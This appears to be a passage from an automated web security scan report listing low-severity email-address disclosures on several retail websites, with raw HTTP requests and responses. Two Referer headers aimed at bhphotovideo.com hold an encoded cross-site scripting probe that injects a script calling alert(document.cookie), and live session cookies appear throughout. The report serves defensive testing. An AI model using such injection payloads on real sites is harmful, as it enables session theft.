Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...

20.10. http://pics.bluenile.com/1526758349/bundles/diamondsearch.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pics.bluenile.com
Path:   /1526758349/bundles/diamondsearch.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1526758349/bundles/diamondsearch.js HTTP/1.1
Host: pics.bluenile.com
Proxy-Connection: keep-alive
Referer: http://www.bluenile.com/build-your-own-diamond-ring?first_step=diamond&forceStep=DIAMONDS_STEP&track=more
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; __utmz=1.1305541144.2.2.utmcsr=bluenile.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.637722072.1305510928.1305510928.1305541144.2; __utmc=1; __utmb=1.2.10.1305541144; testcookie=; dsearch=ver~4&visibleBYOR~800000000&stateBYOR~RD-23-1567-------319.0-1558631.0-----------0------0%2C0%2C0-price-asc-USD--2%2C3%2C4%2C5%2C6-; stc=3NZR3Q; bld=ver~3&BYOR~DIAMONDS_STEP-DIAMONDS_STEP-0---

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:32:44 GMT
Expires: Wed, 12 May 2021 15:25:54 GMT
Last-Modified: Sun, 06 Nov 2005 12:00:00 GMT
Cache-Control: public, max-age=315360000, post-check=315360000, pre-check=315360000
Content-Type: text/javascript;charset=ISO-8859-1
ETag: 2740050219
Server: Footprint Distributor V4.6
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Vary: Accept-Encoding
Content-Length: 93502

BN.namespace("diamonds");BN.diamonds=function(){return{getShapeName:function(A){var B={RD:"Round",PR:"Princess-Cut",EC:"Emerald-Cut",AS:"Asscher-Cut",MQ:"Marquise-Cut",OV:"Oval",RA:"Radiant-Cut",PS:"P
...[SNIP]...
U};this.getPricePerCarat=function(){return A};this.getMfgDate=function(){return R};this.getNonMfgDate=function(){return Z};this.getCertLab=function(){return B}}});
/* Copyright (c) 2008 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*/
(function
...[SNIP]...

20.11. https://secure.bhphotovideo.com/FrameWork/js/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 11:06:48 GMT
Connection: keep-alive
Content-Length: 6834

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg     url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg     name(stri
...[SNIP]...

20.12. https://secure.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /FrameWork/js/jquery/jquery.styledDropdown.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FrameWork/js/jquery/jquery.styledDropdown.min.js HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Server: Web-Server
Content-Type: application/x-javascript
Last-Modified: Mon, 19 Apr 2010 03:00:24 GMT
ETag: "f26-4bcbc748"
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Mon, 16 May 2011 11:06:52 GMT
Connection: keep-alive
Content-Length: 3878

/**
* Styled Dropdown - jQuery Plugin v0.1.0
* Easily converts SELECT elements to eventful and styleable DL, DT, DD elements.
* Requires jQuery 1.3.x
*
* Copyright 2010, Andres Vidal (code@andresvidal.com)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://www.andresvidal.com/license/styledDropdown
*
* Instructions: Call $(selector).styledDropdown(options) on an element with a jQuery
...[SNIP]...

20.13. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The following email address was disclosed in the response:

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...
<a href="mailto:service@bluenile.com">service@bluenile.com</a>
...[SNIP]...
<a href="mailto:service@bluenile.com" class="blue">service@bluenile.com&nbsp;<img src="/assets/chrome/icons/arrow_white_small_bluebg.gif" width="5" height="8" border="0" />
...[SNIP]...

20.14. http://shop.pacsun.com/home.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.pacsun.com
Path:   /home.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /home.jsp HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD; mbox=check#true#1305510282|session#1305510221453-787352#1305512082; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: max-age=1
Date: Mon, 16 May 2011 01:58:43 GMT
Connection: close
Content-Length: 124098


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
...[SNIP]...
var s=s_gi(s_account);
       s.linkTrackEvents    = 'event11';
       s.linkTrackVars    = 'events,eVar2';
       s.events            = 'event11';
       s.eVar2            = o.icid;
       s.tl(this,'o',o.tl);
   }
}
var email1default = "yourname@gmail.com";
$(function(){

   $("#emailBox").bind('keypress', function(event) {
       var code=event.charCode || event.keyCode;
       if(code && code == 13) {// if enter is pressed
           email1default = $('#emailBox
...[SNIP]...
<input id="email1" name="email" maxlength="40" autocomplete="off" value="yourname@gmail.com" type="text" class="defaultEmail text" tabindex="1" />
...[SNIP]...
<input id="emailBox" class="greyInput" name="email" type="text" value="yourname@gmail.com" autocomplete="OFF" size="12" onfocus="javascript:formInputs(this)" onblur="javascript:formInputsOut(this)" />
...[SNIP]...

20.15. http://shoprunner.force.com/content/JsContentElementsGNC

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsGNC

Issue detail

The following email address was disclosed in the response:

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...

20.16. http://shoprunner.force.com/content/JsContentElementsPET

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsPET

Issue detail

The following email address was disclosed in the response:

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...
<a href="mailto:MemberServices@ShopRunner.com">MemberServices@ShopRunner.com</a>
...[SNIP]...

20.17. http://static.bhphotovideo.com/FrameWork/js/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.bhphotovideo.com
Path:   /FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: static.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/c/browse/Underwater-Equipment/ci/11585/N/4294551294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937
If-None-Match: "1ab2-4dc758c2"
If-Modified-Since: Mon, 09 May 2011 03:00:18 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 May 2011 03:00:18 GMT
ETag: "1ab2-4dc758c2"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, max-age=7200
Date: Mon, 16 May 2011 10:16:56 GMT
Connection: close
Content-Length: 6834

/* **************************************************
Copyright (c) 2008, B & H Foto & Electronics Corp. All rights reserved. http://wwww.bhphotovideo.com - Author: Andres Vidal
************************************************** */

/**
* jQuery-Plugin "Placeholder"
*
* @version: 1.1.0, 01.19.2011
*
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com
*
* Instructions: Call $(selector).placeholder(options) on an input element with an attribute placeholder.
* @example: $('input#search').placeholder(); // <in
...[SNIP]...
idget with Profile Support.
* This widget extends the default functionality of window.open() with the use of powerful profiles.
*
* @version: 1.0.0, 08.04.2010
* @author: Andres Vidal
* code@andresvidal.com
* http://www.andresvidal.com/labs
*
* @arg     url(mixed) The popup url or object containing an href. Example: Use object [this] or string 'http://www.google.com'
* @arg     name(stri
...[SNIP]...

20.18. http://www.acehardware.com/js/LIB_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/LIB_core.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:49 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 04 May 2011 08:47:00 GMT
ETag: "511655-a9a7-4a26f4cc6a900"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 16:47:49 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43431

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the
...[SNIP]...

20.19. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510830898}; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<font class="details">(e.g. joe@aol.com)</font>
...[SNIP]...

20.20. https://www.acehardware.com/common/checkout/js/jsu-1.0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /common/checkout/js/jsu-1.0.js

Issue detail

The following email address was disclosed in the response:

Request

GET /common/checkout/js/jsu-1.0.js HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: https://www.acehardware.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:35 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Fri, 15 Oct 2010 07:09:00 GMT
ETag: "147003d-62c0-492a280329b00"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 08:02:35 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 25280

/**
* @name script
*/
if(typeof(u) == 'undefined'){
/**
* the base class for the jsu library. does nothing right now
* @author Brad Hurley me@bradhurley.com
* @class
* @static
* @version 1.0.8
* @event serviceRequest {activeServiceRequests url parameters}
* @event serviceRequestComplete {activeServiceRequests url parameters}

...[SNIP]...

20.21. https://www.acehardware.com/js/LIB_core.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: https://www.acehardware.com/checkout/index.jsp?process=login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511353374}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:44 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 04 May 2011 08:47:00 GMT
ETag: "511655-a9a7-4a26f4cc6a900"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 08:02:44 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/x-javascript
Content-Length: 43431

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the
...[SNIP]...

20.22. http://www.armaniexchange.com/category/customer+service/where+is+my+order/check+order+status.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /category/customer+service/where+is+my+order/check+order+status.do

Issue detail

The following email address was disclosed in the response:

Request

GET /category/customer+service/where+is+my+order/check+order+status.do HTTP/1.1
Host: www.armaniexchange.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; customer=none; basket=none; s_cc=true; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"https://www.armaniexchange.com/account/login.do","pv":5,"lc":{"d0":{"v":5,"s":true,"e":1}},"cd":0,"sd":0,"f":1305511392054}; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/category/customer%25252Bservice/where%25252Bis%25252Bmy%25252Border/check%25252Border%25252Bstatus.do%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:16:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:16:29 GMT
Connection: close
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 10:16:29 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 10:16:29 GMT
Content-Length: 55800


            <script language="JavaScript">
// Disable edit cell tab.
parent.editCell.className =
...[SNIP]...
<a href="/category/customer+service/contact+us.do">custserv@armaniexchange.com</a>
...[SNIP]...
<a href="/category/customer+service/contact+us.do">custserv@armaniexchange.com</a>
...[SNIP]...

20.23. http://www.bhphotovideo.com/FrameWork/js/common.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bhphotovideo.com
Path:   /FrameWork/js/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /FrameWork/js/common.js?v=05152011 HTTP/1.1
Host: www.bhphotovideo.com
Proxy-Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
